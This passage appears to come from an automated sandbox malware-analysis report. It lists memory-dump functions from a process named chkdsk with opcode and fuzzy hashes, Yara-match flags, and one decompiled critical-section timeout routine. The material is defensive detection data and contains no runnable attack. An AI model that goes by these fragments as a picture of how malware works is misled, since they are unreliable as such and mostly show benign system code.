                                                                        • Source File: 00000003.00000002.571893716.0000000000B20000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_b20000_chkdsk.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ErrorMode
                                                                        • String ID:
                                                                        • API String ID: 2340568224-0
                                                                        • Opcode ID: d4c4fb61fca30dc6897689a68a201e21eddd4c07fd029ba9ad0561dc71e4192a
                                                                        • Instruction ID: afadec9553441bb5913d2b734fce48fc1f0a714dbdc1144e6f00101c4ff045b9
                                                                        • Opcode Fuzzy Hash: d4c4fb61fca30dc6897689a68a201e21eddd4c07fd029ba9ad0561dc71e4192a
                                                                        • Instruction Fuzzy Hash: 84D05EB5BC83083BF620A6EAEC47F1632CC9B18750F044094F94CDB2C2D850F50086A9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055D967A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.573083356.0000000005570000.00000040.00001000.00020000.00000000.sdmp, Offset: 05570000, based on PE: true
                                                                        • Associated: 00000003.00000002.573083356.000000000568B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000003.00000002.573083356.000000000568F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5570000_chkdsk.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: a6ca0854ac1e2d44f488fa33b499feaf1c0e55b57cbcf6040cb90b62e7c39cf2
                                                                        • Instruction ID: c2ec5054db6628b1f7e3f587187fb8937438d2205cfa287dff7499e12a71938c
                                                                        • Opcode Fuzzy Hash: a6ca0854ac1e2d44f488fa33b499feaf1c0e55b57cbcf6040cb90b62e7c39cf2
                                                                        • Instruction Fuzzy Hash: 8FB02B729010C0C5D610D3700608B37792077C0340F12C011D1020240A0738C080F2B2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Non-executed Functions

                                                                        Function 00B24DB1 Relevance: .0, Instructions: 17COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.571893716.0000000000B20000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_b20000_chkdsk.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 664d14b7991fb4393cbe6991365a45428e1e595262dc4b6fa0eee6f73339683b
                                                                        • Instruction ID: 317a5ae395d5c81e3f3b354d330302efc411c5464da70251b7866c18df643b77
                                                                        • Opcode Fuzzy Hash: 664d14b7991fb4393cbe6991365a45428e1e595262dc4b6fa0eee6f73339683b
                                                                        • Instruction Fuzzy Hash: 5FC08C23F982040EE121080D3C422F0EB289393235F4022E3EC48E72919283CC12019A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0562FDDA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 53%
                                                                        			E0562FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E055DCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E05625720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E05625720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                                        0x0562fdda
                                                                        0x0562fde2
                                                                        0x0562fde5
                                                                        0x0562fdec
                                                                        0x0562fdfa
                                                                        0x0562fdff
                                                                        0x0562fe0a
                                                                        0x0562fe0f
                                                                        0x0562fe17
                                                                        0x0562fe1e
                                                                        0x0562fe19
                                                                        0x0562fe19
                                                                        0x0562fe19
                                                                        0x0562fe20
                                                                        0x0562fe21
                                                                        0x0562fe22
                                                                        0x0562fe25
                                                                        0x0562fe40

                                                                        APIs
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0562FDFA
                                                                        Strings
                                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0562FE2B
                                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0562FE01
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.573083356.0000000005570000.00000040.00001000.00020000.00000000.sdmp, Offset: 05570000, based on PE: true
                                                                        • Associated: 00000003.00000002.573083356.000000000568B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000003.00000002.573083356.000000000568F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5570000_chkdsk.jbxd
                                                                        Similarity
                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                        • API String ID: 885266447-3903918235
                                                                        • Opcode ID: 04275c4541d7e92fddc1d06b551537ef537e2ce196b8b0d92480165d76bbda69
                                                                        • Instruction ID: 8fba66eaae5ff214d27d370446f8a4692d5fbd0881f1875d51b3cbdc38b8adbe
                                                                        • Opcode Fuzzy Hash: 04275c4541d7e92fddc1d06b551537ef537e2ce196b8b0d92480165d76bbda69
                                                                        • Instruction Fuzzy Hash: F8F0C276240611BBD6212A45DC06E33BF6AEB44730F140214F6685A5D1DA62AC60DAB4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%